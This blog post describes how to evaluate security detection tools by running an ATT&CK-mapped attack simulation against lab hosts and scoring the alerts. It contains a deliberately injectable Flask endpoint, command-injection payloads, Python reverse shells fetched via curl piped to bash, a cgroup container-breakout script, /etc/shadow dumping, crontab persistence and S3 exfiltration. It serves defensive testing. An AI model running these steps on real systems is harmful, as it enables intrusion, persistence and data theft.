Jeremy Mill


Evaluating Security Tools

Evaluating Security Solutions

From time to time in my security career I've been asked to select a new security tool or vendor to generate security events and alert on suspicious or malicious behavior. Sometimes these are network-based solutions, other times they're host-based, and still other times they're something in between, operating on Kubernetes or cloud infrastructure.

Regardless of how the tool is designed to work, it should create alerts that can be mapped to tactics and techniques in the MITRE ATT&CK framework. If you're not familiar with the ATT&CK framework, you should pause here and read the excellent ATT&CK 101 blog post.

This article should give you an idea of how to take a security solution and build a test case for it, mapping our "attacker" actions to the ATT&CK framework and then comparing those actions to the alerts generated by the tool. I will also show you a sample scorecard to evaluate and compare different vendors. Every time I've run one of these tests I have been surprised by the results, most often in a bad way. Which is to say, I've learned much more about the weaknesses of various tools by running these tests than I would have via any other method.

1 - Requirements Gathering

Before you can run any test of a security tool you need to know what your requirements are. This means understanding what you need it to do versus what you want it to do, and what your nice-to-haves are. For example, many security tools (at the time of writing, and hopefully not for long) don't support monitoring security events that occur inside of containers. Others will only support monitoring events inside of a particular container runtime. You need to determine for yourself whether seeing those events is critical, important, or nice-to-have. For me, during my last test, it was critical, and that shaped the test plan.

A (very abbreviated) sample set of requirements:


  • monitoring of hosted kubernetes environments (GKE, EKS, etc)
  • monitoring of self-hosted kubernetes environments
  • monitoring of traditional linux VMs
  • monitoring of traditional linux VMs running docker
    • via docker runtime
    • via containerd


  • ability to write and customize alerts

Nice to Haves

  • native monitoring of DNS
  • Integration with threat-intel feeds
    • e.g. alerts for connections to malicious IPs

You should spend as much time as you need on this step because it is the input to all the future steps and, as they say, garbage in, garbage out.
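One way to make the requirements usable later is to write them down as data with an explicit priority. The sketch below is only an illustration: the priority assigned to each requirement and the `vendor_x` capability set are assumptions made up for the example, not results from a real evaluation.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Requirement:
    name: str
    priority: str  # "critical", "important", or "nice-to-have"


# Priorities here are illustrative assumptions; set them from your own needs.
REQUIREMENTS = [
    Requirement("hosted kubernetes monitoring", "critical"),
    Requirement("self-hosted kubernetes monitoring", "critical"),
    Requirement("linux VM monitoring", "critical"),
    Requirement("custom alerts", "important"),
    Requirement("native DNS monitoring", "nice-to-have"),
    Requirement("threat-intel feed integration", "nice-to-have"),
]


def missing_by_priority(supported: set[str]) -> dict[str, list[str]]:
    """Group the requirements a tool does NOT meet by their priority."""
    missing: dict[str, list[str]] = {}
    for req in REQUIREMENTS:
        if req.name not in supported:
            missing.setdefault(req.priority, []).append(req.name)
    return missing


# Hypothetical vendor, purely for illustration.
vendor_x = {"hosted kubernetes monitoring", "linux VM monitoring", "custom alerts"}
gaps = missing_by_priority(vendor_x)
print(gaps)
```

A tool with anything listed under "critical" can be dropped before you spend time building a test environment for it.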

2 - Design a test plan

Test plans come in all shapes and sizes but in general I try to ensure that I have at least one action for the following tactics from the ATT&CK framework:

  • Recon
  • Initial Access
  • Execution
  • Persistence
  • Privilege Escalation
  • Credential Access
  • Discovery
  • Lateral movement
  • Exfiltration

This isn't to say that the others aren't important, but for me, those are the ones I want to make sure I have for a basic test.
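A quick way to check a draft plan against that list is to tag each planned action with its tactic and look for gaps. This is a minimal sketch; the `draft_plan` entries are hypothetical examples, not the full plan used later in this article.

```python
# The tactics from the list above that a basic test should touch.
REQUIRED_TACTICS = {
    "Recon", "Initial Access", "Execution", "Persistence",
    "Privilege Escalation", "Credential Access", "Discovery",
    "Lateral Movement", "Exfiltration",
}


def uncovered_tactics(plan: list[tuple[str, str]]) -> set[str]:
    """Return the required tactics that no planned action maps to."""
    covered = {tactic for _action, tactic in plan}
    return REQUIRED_TACTICS - covered


# Hypothetical draft plan: (action, tactic) pairs.
draft_plan = [
    ("nmap scan of the host", "Recon"),
    ("exploit the vulnerable web app", "Initial Access"),
    ("python reverse shell", "Execution"),
    ("modify crontab", "Persistence"),
    ("upload data to cloud storage", "Exfiltration"),
]

print(sorted(uncovered_tactics(draft_plan)))
```

Anything printed here is a tactic the draft does not exercise yet.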

In my experience it isn't important for the tactics and techniques you use to be complex or advanced. As a matter of fact, it's best if your initial round of testing isn't advanced or fancy. By default many security tools won't even detect the basics in a meaningful way and you can always take the things you DID detect and make them fancier and re-test.

2 - Test Setup

2a - Target machines

The following is my generalized setup for the test machines from my most recent test:

  • An Ubuntu 20.04 server named target-a with:
    • docker + containerd
    • a 20 GB file of junk data to "exfil"
    • a container vulnerable to RCE running in privileged mode (details later)
    • an SSH key owned by root
  • A second Ubuntu 20.04 server named lat-a with:
    • the SSH public key from target-a added to authorized_keys

A sample script that can be used to automate the setup of target-a can be found here:

If the security tool you're evaluating is host-based, don't forget to add a step to the install script to install your security solution; otherwise, you're not going to generate many events. I'm not saying I've forgotten before but, uh, I've definitely wasted time...

2b - The vulnerable app

The container vulnerable to RCE is very simple. Like I said before, complexity isn't necessary for this kind of test. The /isup API is subject to a trivial RCE bug. Sample payloads are provided in section 3b below.

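from flask import Flask
from flask_restful import reqparse, abort, Api, Resource
import subprocess

app = Flask(__name__)
api = Api(app)

# Parse the 'url' field from the request body
parser = reqparse.RequestParser()
parser.add_argument('url')

class IsUp(Resource):
    def post(self):
        args = parser.parse_args()
        url = args['url']
        # Intentionally vulnerable: user input goes straight into a shell command
        command = f'curl -L {url}'
        rval = subprocess.call(command, shell=True)
        if rval != 0:
            return {'status': 'down'}, 400
        return {'status': 'up'}, 200

class HealthCheck(Resource):
    def get(self):
        return '', 200

api.add_resource(IsUp, '/isup')
api.add_resource(HealthCheck, '/')

if __name__ == '__main__':
    # Listen on all interfaces so the app is reachable from outside the container
    app.run(host='0.0.0.0', port=8080)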
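To see why the /isup handler is injectable, here is a small, harmless sketch of the same pattern. It assumes a POSIX shell, uses echo in place of curl so that nothing touches the network, and the example.com URL is just a placeholder.

```python
import subprocess


def build_command(url: str) -> str:
    # Same string-interpolation pattern as the /isup handler,
    # with echo standing in for curl.
    return f"echo fetching {url}"


# A well-behaved value produces exactly one command.
benign = subprocess.run(build_command("http://example.com"),
                        shell=True, capture_output=True, text=True)

# The shell treats && as a separator, so the text after it runs as a second command.
injected = subprocess.run(build_command("http://example.com && echo INJECTED"),
                          shell=True, capture_output=True, text=True)

print(benign.stdout)
print(injected.stdout)
```

The second call prints an extra line that the "application" never intended to run, which is exactly what the payloads in section 3b rely on.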


FROM python
RUN pip install flask flask-restful
RUN mkdir -p /app
ADD /app/
CMD ["python", "/app/"]

2c - Our attacker machine

Our attacker machine is going to be any linux box. The only requirement is that the box has an IP address accessible by the target machine. For the basic steps detailed in section 3 the tools required are:

  • netcat
  • curl

For the additional, more advanced steps I used Sliver as a C2. Sliver is an excellent tool for the job and, unlike some other tools, it's FOSS! You can easily replace Sliver with your tool of choice, however.

3 - The attack plan

Our attack plan is outlined below:

| Event | Type | MITRE ATT&CK Technique | Observed |
|---|---|---|---|
| Scanning of host (nmap) | Network, Host, Container | Recon - Active Scanning - T1595.001 | |
| Command injection - testing | Network, WAF, Container | Recon - Active Scanning - T1595.002 | |
| Reverse shell in container | Network, Container | Initial Access - Exploit Public-Facing Application - T1190; Execution - Command and Scripting Interpreter (python) - T1059.006 | |
| Data collection / recon in container | Container | Recon - Gather Victim Host Information: Software - T1592.002 | |
| Container breakout | Host, Container | Priv. Esc. - Escape to Host - T1611 | |
| Reverse shell in host | Network, Host | Execution - Command and Scripting Interpreter (python) - T1059.006 | |
| Data collection / recon in host | Host | Recon - Gather Victim Host Information: Software - T1592.002 | |
| Credential Access: dump /etc/shadow | Host | Cred. Access - Credentials from Password Stores - T1555 | |
| Credential Access: searching for plaintext passwords | Host | Cred. Access/Discovery - Credentials from Password Stores - T1555 | |
| Discovery: dump /etc/passwd | Host | Discovery - Account Discovery: Local Account - T1087.001 | |
| Persistence: modify crontab | Host | Persistence - Scheduled Task/Job: Cron - T1053.003 | |
| Attacker installed tooling: AWS CLI | Host | N/A | |
| Exfil: AWS S3 bucket upload | Network, Host | Exfiltration - Exfiltration Over Web Service: Exfiltration to Cloud Storage - T1567.002 | |
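Keeping the plan as data makes it easy to work out which events a given kind of tool could reasonably be expected to see. The sketch below encodes a subset of the rows above; the shortened event names and the `expected_events` helper are my own illustration, not part of any tool.

```python
# (event, sensor types that could observe it, ATT&CK technique ID)
ATTACK_PLAN = [
    ("Scanning of host (nmap)", {"Network", "Host", "Container"}, "T1595.001"),
    ("Command injection - testing", {"Network", "WAF", "Container"}, "T1595.002"),
    ("Reverse shell in container", {"Network", "Container"}, "T1190"),
    ("Container breakout", {"Host", "Container"}, "T1611"),
    ("Dump /etc/shadow", {"Host"}, "T1555"),
    ("Modify crontab", {"Host"}, "T1053.003"),
    ("S3 bucket upload", {"Network", "Host"}, "T1567.002"),
]


def expected_events(tool_types: set[str]) -> list[str]:
    """List the events a tool with these sensor types should be able to see."""
    return [event for event, types, _technique in ATTACK_PLAN if types & tool_types]


# A purely network-based tool should not be penalized for missing host-only events.
print(expected_events({"Network"}))
```

Filtering this way before scoring keeps the comparison fair when the tools under test work at different layers.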

Some additional more advanced steps that we shouldn't run until (at least) our second round of testing and that we won't cover in this simplified guide:

| Event | Type | MITRE ATT&CK Technique | Observed |
|---|---|---|---|
| Sliver C2 | Network, Host, Container | Command and Control - Application Layer Protocol: Web Protocols - T1071.001 | |
| Hide the file from Sliver C2 | Host | Defense Evasion - Hide Artifacts: Hidden Files and Directories - T1564.001 | |
| Run the ps command to see processes | Host | Discovery - Process Discovery - T1057 | |
| Gathering data from GCP buckets | Host | Discovery - Cloud Storage Object Discovery - T1619 | |
| Discover hosts on the same subnet | Network, Host | Recon - Active Scanning - T1595 | |
| Use stolen key to move laterally | Network, Host | Lateral Movement - Remote Services - T1021 | |

We won't run through all of these steps in detail, but we will run through several of them.

3a - Scanning

From the attacker host, scan the public IP of target-a

nmap -sS -sV -vv -O $VICTIM_IP

3b - Test command injection

We want to do three things here:

  • a valid test (baseline)
  • a blind test (sleep)
  • a test with output (whoami)
curl -XPOST -H 'Content-Type: application/json' -d '{"url":""}'  http://$VICTIM_IP/isup # valid test

curl -XPOST -H 'Content-Type: application/json' -d '{"url":" && sleep 10"}'  http://$VICTIM_IP/isup # blind test, takes 10 seconds to return

curl -XPOST -H 'Content-Type: application/json' -d '{"url":" && whoami"}'  http://$VICTIM_IP/isup # test getting output (non-blind)

3c - Reverse shell on the container

Now we want to spawn a reverse shell from the container back to our attacker machine. On our attacker machine we want to start our reverse shell listener on port 55555:

nc -lnvp 55555

Now create a github gist (or pastebin or simple webserver on our attacker box etc.) with the following contents. This is an optional step, but I find it makes keeping track of things easier. Make sure to replace <YOUR ATTACKER IP HERE> with your attacker IP:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR ATTACKER IP HERE>",55555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Note that you can generate alternate reverse shells easily using

Run the injection and spawn our reverse shell, replacing <YOUR GIST URL> with your gist url or rev shell

curl -XPOST -H 'Content-Type: application/json' -d '{"url":" && curl <YOUR GIST URL> | /bin/bash"}' http://$VICTIM_IP/isup

3d - Data collection / recon in container

From our newly created reverse shell, let's run some verifiable actions that we should see in our security tool:

cat /etc/os-release
uname -r

At this point we can probably guess that we're inside of a container and we should try and break out!

3e - Container Breakout + Host Shell

For the container breakout step we're going to use a process called PID bashing. You can read more about it here:

To do it, we're first going to create another gist/paste/file-on-webserver with the following contents (making sure to replace the IP placeholder again):



#!/bin/sh

# Working paths and names (example values; adjust as needed)
OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh
OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}
# Commands to run on the host
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR ATTACKER IP HERE>",55554));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
  if [ $((${TPID} % 100)) -eq 0 ]
  then
    echo "Checking pid ${TPID}"
    if [ ${TPID} -gt ${MAX_PID} ]
    then
      echo "Exiting at ${MAX_PID} :-("
      exit 1
    fi
  fi
  # Set the release_agent path to the guessed pid
  echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
  # Trigger execution of the release_agent
  sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
  TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}

Then we're going to start another listener on our attacker box and trigger the breakout by running the script from our shell in the container:

nc -lnvp 55554 &
curl <Your gist URL> | /bin/bash

Yay! We should now have a shell on the host machine as root!

3f - Recon and Cred. Access in the Host

Now we want to run some more actions that should raise alerts as we do some recon and credential access

cat /etc/os-release
uname -r
cat /etc/passwd
cat /etc/shadow
ls ~/.ssh

3g - Persistence in the host

Now we want to add some basic persistence. There are sneakier ways to get persistence, but an incredibly simple (and common!) method is to modify the crontab to spawn a new reverse shell on a schedule. Make sure to check for <attacker_ip> placeholders and replace them with your values!

echo "* * * * * root python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attacker_ip>\",55555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" >> /etc/crontab

3h - Install some tools and exfil data

Please note that to run this step you'll need an S3 bucket and some write-only IAM keys. You can change this to writing to any other file storage solution of your choice, however.

Now we want to install some quick tools, in this case the AWS CLI, and exfil some imaginary data that we created when we set up the victim box.

apt install -y unzip 
curl "" -o ""
sudo ./aws/install
# enter the access key id and secret key in this next step along with the region of your bucket
export PATH="/usr/local/bin:$PATH"
aws configure
aws s3 cp /data.enc s3://attack-sim-bucket/

There's nothing super special here, but if your box is on, say, Azure, someone installing the AWS CLI should probably be an alert.

4 - Check for Events and score

Now that we've run through our attack scenario, it's time to tally some scores! I should really emphasize that these scores are just one possible weighting, and you should feel free to disagree with me based on the risks that you're facing and the things that you think are most important! You might also want to change the weights and the events considered based on the type of tool you're evaluating, or if you're evaluating multiple tools working in parallel with each other.

| Event | Points | Observed? |
|---|---|---|
| Scanning | 1 | |
| Command Injection - testing | 2 | |
| Container Reverse Shell | 3 | |
| Data Collection/Recon in Shell | 2 | |
| Container Breakout | 3 | |
| Host Reverse Shell | 4 | |
| Data Collection/Recon in Host | 2 | |
| Dumping /etc/shadow | 2 | |
| Persistence via crontab | 3 | |
| Attacker installed tooling | 1 | |
| Exfil of data to s3 bucket | 1 | |
| Natively alert on curl-> bash | 2 | |
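If you are comparing several vendors, tallying the scorecard in code keeps the arithmetic honest. The weights below are the ones from the table; `vendor_a` and `vendor_b` and the events they "observed" are hypothetical and only there to show the mechanics.

```python
# Points per event, taken from the scorecard above.
SCORECARD = {
    "Scanning": 1,
    "Command Injection - testing": 2,
    "Container Reverse Shell": 3,
    "Data Collection/Recon in Shell": 2,
    "Container Breakout": 3,
    "Host Reverse Shell": 4,
    "Data Collection/Recon in Host": 2,
    "Dumping /etc/shadow": 2,
    "Persistence via crontab": 3,
    "Attacker installed tooling": 1,
    "Exfil of data to s3 bucket": 1,
    "Natively alert on curl-> bash": 2,
}


def score(observed: set[str]) -> tuple[int, int]:
    """Return (points earned, points possible) for the events a tool alerted on."""
    unknown = observed - SCORECARD.keys()
    if unknown:
        raise ValueError(f"events not on the scorecard: {sorted(unknown)}")
    earned = sum(SCORECARD[event] for event in observed)
    return earned, sum(SCORECARD.values())


# Hypothetical results, for illustration only.
vendor_a = {"Scanning", "Container Reverse Shell", "Host Reverse Shell",
            "Persistence via crontab"}
vendor_b = {"Container Breakout", "Dumping /etc/shadow"}

for name, observed in (("vendor_a", vendor_a), ("vendor_b", vendor_b)):
    earned, possible = score(observed)
    print(f"{name}: {earned}/{possible}")
```

Rejecting unknown event names catches typos in the results sheet before they silently lower a vendor's score.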


Nothing like this gets done in a vacuum, so huge thanks to two members of my team who were instrumental in this most recent version of this test.


This is just a single possible test setup that you can use for testing and evaluating a security tool or a set of security tools. It is not by any means an exhaustive test; if anything, it's extremely basic. But if you try it with your security tools, I bet you'll be amazed at what is and isn't caught, and you'll learn something valuable. There are some great resources out there for finding different methods to use with different platforms and threat scenarios. One of my favorites is Atomic Red Team.

Have you tried this? Do you have a different testing methodology? I'd love to hear all about it! Leave me a comment, or send me an email, or hit me up on twitter. Thanks!
